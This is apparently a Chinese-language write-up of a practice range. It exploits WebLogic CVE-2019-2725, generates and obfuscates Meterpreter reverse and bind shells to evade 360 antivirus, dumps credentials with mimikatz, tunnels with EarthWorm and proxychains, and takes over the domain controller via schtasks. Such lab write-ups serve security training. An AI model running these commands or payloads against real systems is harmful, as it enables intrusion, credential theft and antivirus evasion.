環境配置
內網2靶場由三台機器構成:WIN7、2008 server、2012 server
其中2008做為對外的web機,win7作為個人主機可上網,2012作為域控
網絡適配器已經設置好了不用自己設置
初始密碼1qaz@WSX
WEB主機初始的狀態默認密碼無法登錄,切換用戶 de1ay/1qaz@WSX ,然后修改WEB\de1ay的密碼
注意需要手動開啟服務,在 C:\Oracle\Middleware\user_projects\domains\base_domain\bin 下有一個 startWeblogic 的批處理,管理員身份運行它即可,管理員賬號密碼:Administrator/1qaz@WSX
由於web主機自己設置了ip地址,還需要改成自動獲取ip地址,不然kali無法探測該主機
外網主機信息收集
nmap探測端口,一個web服務器一個個人pc
目標web主機對外的ip地址為192.168.200.30 ,開放了80,但是看了看什么東西也沒有,1433sqlserver,7001http服務 weblogic中間件
由於剛剛環境配置的時候開的就是weblogic服務,所以猜測肯定這里有問題
訪問weblogic后台 默認路徑為192.168.200.30:7001/console,得到了一個版本號10.3.6.0
因為我對這個中間件不是很熟悉,先kali searchsploit搜索了一下大概存在哪漏洞
看到存在命令執行漏洞和java反序列化,但是我也不知道具體是哪一個,所以網上找到了一個針對weblogic的掃描工具rabbitmask/WeblogicScan
python3 WeblogicScan.py -u 192.168.200.30 -p 7001
看到檢測出只有java反序列化漏洞 編號為CVE-2019-2725,搜索一下關於這個漏洞的復現,查到有兩種方法
CVE-2019-2725漏洞利用
1、上msf搜索關於這個漏洞的利用模塊
use exploit/multi/misc/weblogic_deserialize_asyncresponseservice set target 1
set RHOSTS 192.168.200.30 set LHOST 192.168.200.6 run
但是攻擊失敗了,突然意識到靶機有360防御,關掉之后才能攻擊。
2、網上的exp(github.com)
漏洞存在的頁面:(若頁面存在則有漏洞)
/_async/AsyncResponseService
但是網上的exp我每個都試了,弄了一下午結果沒有一個成功的,后來看到360的日志,才發現原來是他搞得鬼,把所有的數據包都攔截了,那我就很疑惑網上的wp到底是怎么寫出來的
看來繞過360還是一個大工程啊
功夫不負有心人我差點想要放棄了,還好還是找到了CVE-2019-2725對應的利用腳本,kali如下,下載地址 https://www.exploit-db.com/download/46780
使用方法:將exploit修改成msf生成的ps1文件
但是有360,還得考慮免殺
先用msf生成ps1腳本
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.200.6 LPORT=4444 -f psh-cmd > shell.ps1
免殺這里我選擇了Invoke-Obfuscation 參考文章Invoke-Obfuscation混淆免殺過360和火絨_csdnmmd的博客-CSDN博客
Invoke-Obfuscation下載鏈接:https://github.com/danielbohannon/Invoke-Obfuscation
設置執行策略Set-executionpolicy Unrestricted:允許所有腳本運行。
Import-Module Invoke-Obfuscation.psd1 \\導入模塊
Invoke-Obfuscation \\加載模塊
設置要免殺的木馬
set scriptpath C:\Users\administrator.WIN-2008\Desktop\shell.ps1
選擇編碼混淆 ENCODING
這里選擇的類型有八個,分別是不同編碼,我先試試第一個,輸入1,就會自動生成
輸入
out 1.ps1
將文件輸出,可以看到免殺好的ps1腳本已經做好了
回到kali,我想先是試試看沒免殺的腳本會不會被360攔截,於是就先把沒免殺的ps1復制到exploit中
python 46780.py http://192.168.200.30:7001/_async/AsyncResponseServiceHttps
msf監聽
果然還是被攔截了,接下來試試看免殺之后的
但是,花了一晚上所有都試了一遍發現沒有一個能用的,直到我把360關了之后,再重新試了一下,發現就算沒有360也沒有用,害能力不夠,免殺這邊只能先放放了。
內網信息收集
跳過繞360那一步拿到web主機權限
getsystem提權失敗,應該是因為360的原因
MSF下的會話傳給CS
msf使用注入模塊 + cs創建Listener監聽 (相同payload)
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost (cs listener ip)
set lport (cs listener port)
set session (id)
run
利用cs通過web服務器進行對內網的主機掃描發現
掃到的三台主機,都開了445,后面可以試試永恆之藍
也可以利用msf通過web服務器進行對內網的主機掃描發現
進入shell 查看內網網段
for /L %I in (1,1,254) DO @ping -w 1 -n 1 10.10.10.%I | findstr "TTL="
有一台主機沒掃到,我試了一下web機也ping不到pc不知道什么原因,用路由轉發,讓msf直接掃試試看
獲取目標機內網地址網段
run get_local_subnets
通過background回到msf,使用route增加對應路由,2是sessions值
route add 10.10.10.0 255.255.255.0 2
查看是否設置成功
route print
這樣msf就能掃描到內網的主機了
回到meterpreter會話,掃描10.10.10.0網段
run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24
繼續信息收集,查到域名為de1ay.com,存在兩台域主機WEB和PC,域控制器為DC.de1ay.com,主機名為DC
net time /domain
net user /domain
net group "domain computers" /domain
CS runmimikatz
抓取到web/de1ay和de1ay/mssql用戶的密碼,但是沒抓到域控的密碼(其實通過之前收集到的用戶名,也可以用這個密碼撞一撞)
內網穿越
先設置代理讓kali能訪問內網
兩種工具一個是earthworm,還有一個是ProxyChains
首先將EW上傳到web主機上
在攻擊機運行
./ew_for_linux64 -s rcsocks -l 1080 -e 4444
這條命令的意思是在公網VPS上添加一個轉接隧道,把1080端口收到的代理請求轉發給4444端口
然后在web主機運行
ew_for_Win.exe -s rssocks -d 192.168.200.6 -e 4444
這條命令的意思是在本機服務器上啟動SOCKS5服務,然后反彈到192.168.200.6攻擊機的4444端口
運行完后會顯示連接OK,現在就可以通過訪問攻擊機的1080端口,使用win7的服務器上SOCKS5代理服務
接下來使用proxychains添加代理(KALI中自帶)
輸入打開proxychains進行編輯
vi /etc/proxychains4.conf
首先將dynamic_chain前面的注釋符#刪除
然后在底部改成內容 socks5 127.0.0.1 1080
保存並退出,現在kali可以訪問內網了
setg Proxies socks5:127.0.0.1:1080 ,把msf代理進內網(也可以添加路由)
域內橫向移動
既然抓到了本機的密碼,也開啟了3389,就遠程登陸看看
rdesktop 192.168.200.30:3389
進入后先把360關了
這里我只是試一試,但是居然能連接到
msf創建一個正向連接的shell
msfvenom -p windows/meterpreter/bind_tcp -f exe -o shell.exe
上傳到web機在上傳到域控
定時任務
schtasks /create /s 10.10.10.10 /tn test /sc once /st 17:07 /tr c:\shell.exe /ru system /f
msf監聽
set payload windows/meterpreter/bind_tcp
set rhost 10.10.10.10
set lport 4444
run
拿到域控權限但提權失敗,嘗試手動提權
background
use local_exploit_suggester
show options
set session 4
run
每個都嘗試用了一遍,在切換回sessions
用永恆之藍試試攻擊域控
也可以直接獲取域控權限
(后面我又試了一下永恆之藍,但是一直是藍屏,我也不知道這次是怎么弄的)
psexec.exe也行
總結
這個靶機可能是我配置不太對,做起來有些奇怪,win2008的權限似乎有點高不用ipc連接就能連接到域控,win2008和win7互相 ping不通,也連接不到,感覺win7在這個靶場中存在的意義不大,這個靶場的難點應該就是過360那部分了,后續得學習一下免殺